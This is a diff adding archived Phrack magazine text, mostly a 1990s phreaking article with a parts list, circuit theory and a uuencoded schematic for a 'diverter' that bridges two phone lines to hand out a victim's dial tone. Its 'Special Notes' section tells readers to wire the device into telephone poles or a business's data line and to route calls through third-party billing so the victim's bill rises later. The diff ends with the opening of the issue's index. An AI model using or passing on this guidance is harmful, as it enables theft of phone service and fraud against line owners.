+of this file, so please decode it first, and load it up in your favorite
+image viewer, while you read the next part.  It really helps to follow the
+schematic, while reading the white paper.  After all, anybody can follow
+simple instructions on how to make a diverter, but I would prefer you all
+understand how it works.  I wouldn't want to think I wasted my time on this
+little project ;-)
+
+Parts List:
+-----------
+
+(1) DPDT relay (5VDC Coil Rating)
+(1) 600 Ohm:600 Ohm transformer (Telecom Isolation Type)
+(1) 2N3904 transistor (NPN, Small Signal type)
+(1) Opto-Isolator pair (IR LED/Phototransistor Type)
+(1) 22K Ohm resistor (1/4W, 5%)
+(1) 470 Ohm resistor (1/4W, 5%)
+(4) 1N4003 diodes (200 PIV)
+(1) 7805 IC (5VDC, Positive Voltage Regulator)
+(1) 0.33uF capacitor (Mylar Type, microfarad)
+
+Parts Notes:
+------------
+
+The transformer is the type you would find in an answering machine, but can be
+picked up for around $7.00.  The opto-isolator is a slotted pair.  That is,
+they are housed in a plastic assembly, that has an IR LED facing onto a photo-
+transistor, with a slot in between them.  The slot is designed for a rotating
+wheel or something similar, but doesn't affect the design at all.  A true
+opto-isolator could be used instead, I guess, but the only ones I could find
+where photodarlington types, and I couldn't really be bothered with them.
+Besides, I happen to think the slotted pair look cooler! ;-)
+
+Anyhow, in my diverter, I replaced the 4 diodes with a full wave bridge
+rectifier in a 4 pin DIP.  It was smaller, and again, it looked cooler.
+The 7805 is a voltage regulator IC.  It has 3 pins, and can be found almost
+anywhere.  Lastly, the capacitor is just a regular mylar device.  If the value
+is higher than 0.4uF, then the diverter will activate with line noise on line
+#1, or if someone picks up line #1, or if the pulse dial!  If it is less than
+0.2uF, then line #1 will ring a couple of times before the diverter picks up.
+Best advice is to simply use a 0.33uF capacitor.  Other stuff you will need is
+hook up wire, plugs and connectors, some sort of protoboard, and a box.  This
+part is up to you, and is where you get to show your phriends at the next 2600
+meeting your creativity.  Using a Rubbermaid (tm) tub is pretty creative.  I
+just went with a plain project box from Hammond (tm).  Ah well...
+
+Schematic:
+----------
+
+NO ASCII SCHEMATICS FOR YOU!   DECODE THE GIF AT THE END OF THIS FILE INSTEAD!
+
+Theory of Operation:
+--------------------
+
+Ok, looking at the schematic, we see RED #1, GREEN #1, RED #2 and GREEN #2.
+Obviously, these are the two lines.  Now, line #1 is going to be the line
+that we initially call into to get the dial tone, and line #2 is going to be
+the line of the dial tone that we actually get.
+
+We see that in the normal state, the DPDT relay is not activated.  This
+presents an open circuit to line #2.  Current cannot flow from GREEN #2 to
+RED #2, because of the open relay.  Thus, line #2 is in the on-hook state.
+The same is the case for line #1.  Current cannot flow from GREEN #1 to RED #1
+because of the open relay contacts.  Also, because the voltage across the two
+wires is 48VDC, the direct current is blocked by the capacitor, C1.  Thus, 
+current from line #1 cannot enter the rectifier either.  In the normal state,
+both lines #1 and #2 are on-hook.
+
+Now, you dial up the number for line #1.  The 48VDC, becomes a ringing signal
+of 90-130VAC @ 20Hz.  This causes an alternating current to pass the capacitor
+C1, and into the full wave bridge rectifier.  This causes a DC voltage to
+appear on the output of the rectifier, which flows through the IR LED in the
+opto-isolator, lighting it up.  As the IR light hits the phototransistor,
+the phototransistor's collector current starts to flow.  This causes the
+second transistor's base current to flow.  This causes the transistor's
+collector current to flow, which turns on the DPDT relay.  Now, as the relay
+turns on, current can now flow from GREEN #1 through D1 in the full wave
+bridge rectifier, through the IR LED in the opto-isolator and it's current
+limiting resistor, through one half of the DPDT relay's contacts, through one
+winding of the transformer, and to the RED #1.  Also, at the same time, we now
+have current flowing from GREEN #2 through the second half of the DPDT relay's
+contacts, through the other winding of the transformer, and to RED #2.
+
+In effect, the diverter is picking up both lines.  Now, you would think that
+if the diverter picked up both lines, then the ringing signal would stop on
+line #1, and the IR LED would turn off, thus turning off the whole circuit.
+Well, this is partially correct.  However, notice that line #1 is now flowing
+THROUGH the IR LED, which keeps it on!  So, the ring signal initially turns on 
+the IR LED, and the off-hook current of about 6-10VDC keeps it on!
+
+So, now, you are connected to line #1.  Line #2 is off-hook as well, and both
+line #1 and line #2 are being bridged via the transformer.  Thus, any and all
+audio is passed between both lines.  What this means is that you get the dial
+tone from line #2, and you can send your DTMF's from line #1.
+
+Ok, now you make your call.  Now, you hang up on line #1.  Now, for about 10
+seconds, the diverter stays active.  But then, the CO sends a disconnect
+signal to line #1.  If you remember back, this is just a reversal of polarity
+between the ring and tip, that is the GREEN #1 and RED #1.  Doing so, the
+IR LED, being a polarity sensitive device, turns off.  This causes the
+phototransistor's collector current to goto zero. This causes the transistor's
+base current to goto zero as well, and as a result, the transistor's collector
+current goes to zero as well, thus turning off the relay, and putting both
+line #1 and line #2 on-hook again.  The diverter is now ready for another
+call.  There...simple huh?
+
+Special Notes:
+--------------
+
+The diverter can be installed anywhere you have access to 2 lines.  Obviously,
+green base's, can's, telephone pole's, network interface's etc... are all prime
+locations for the diverter.  Now, you need a lineman's handset or a "Beige Box"
+and access to an ANI read back circuit, in order to determine the numbers of
+the line's you are using.
+
+Once the device is installed, anyone and everyone calling line #1 will receive
+a dial tone.  This means that you cannot simply leave the device installed for
+a whole month.  That is, unless you manage to find a line that is unpublished
+and used for outgoing calls or something.  An example is a corporate data line
+used by a local (unnamed) fast food restaurant that sends payroll data at
+night, once a week.  You get your diverter on this line, and you could leave
+it there for a while.
+
+Also, it is a good idea, once you get the dial tone, to use calling cards, or
+third party calling to complete your call.  That way, your calls don't show up
+on line #2's bill right away.  Usually, it will show up on the next bill of
+the person you third party'd, and it will take another month or two to reach
+the bill of line #2.  However, line #2 will also get service charges for the
+third party, so their bill will be even higher than if you just used their
+line directly.
+
+Ok, as for the circuit...I've gotten into a habit of designing all my circuits
+to operate at 5VDC.  Although this isn't too necessary in this circuit, it
+makes it totally TTL and CMOS compatible, should you want add digital gating
+and other fancy stuff to the basic diverter.  Well, that's enough rambling from
+me for now...go and get yourself some parts!
+
+Shout Out's:
+------------
+
+Shout's to the Vancouver, BC hack community...you know who you are...
+Shout's to all the guys at Phrack...keep the legend going....
+Shout's to the Niagara Falls, ON hack community...(IS there one?)
+Hell, shout's to the whole damn community...we're still alive and kicking
+right!
+
+Oh yeah, I can't miss out our beloved BC Tel!  Keep those rates increasing,
+and keep installing those ultra fancy NorTel Millenium's in the high vandalism
+and high crime areas!
+
+That's all folks...
+
+=[MasterMiiND]=
+
+==============================BEGIN UUENCODED GIF=============================
+
+begin 644 diverter.gif
+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
+8%?[TJ5]]ZU\?^]G7_O:YWWWOOZ$````[
+`
+end
+
+==============================END UUENCODED GIF===============================
+
+EOF
+
+
+
diff --git a/phrack51/1.txt b/phrack51/1.txt
new file mode 100644
index 0000000..ea5b9c0
--- /dev/null
+++ b/phrack51/1.txt
@@ -0,0 +1,182 @@
+---[  Phrack Magazine   Volume 7, Issue 51 September 01, 1997, article 01 of 17
+
+
+-------------------------[  P H R A C K     5 1     I N D E X
+
+
+--------[  Registered Hex Offenders
+
+
+    DefCon.  I love DefCon.  Why do I love DefCon?  Several reasons.  I get to 
+see many people I do not normally get to hang out with.  And it's in Las Vegas.
+Ok, I guess that's two reasons.  I love DefCon for two reasons.
+
+    Las Vegas is a blast.  No two ways about it.  Free drinks _while_ you get 
